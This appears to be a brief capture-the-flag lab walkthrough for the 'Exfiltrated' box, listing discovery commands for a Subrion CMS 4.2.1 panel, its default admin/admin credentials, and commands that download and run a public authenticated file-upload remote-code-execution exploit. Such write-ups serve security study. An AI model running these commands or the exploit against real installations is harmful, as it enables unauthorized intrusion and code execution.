Subrion CMS
Discovery
curl http://exfiltrated.offsec/robots.txt
curl http://exfiltrated.offsec/panel/intelli.config.admin_url = 'http://exfiltrated.offsec/panel';
Powered by Subrion CMS v4.2.1Default Credentials
Username: admin
Password: adminAuthenticated Upload RCE
wget https://raw.githubusercontent.com/Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-/refs/heads/main/exploit.py
python3 exploit.py -u http://exfiltrated.offsec/panel -l admin -p adminSubrion Config and Database
References
Last updated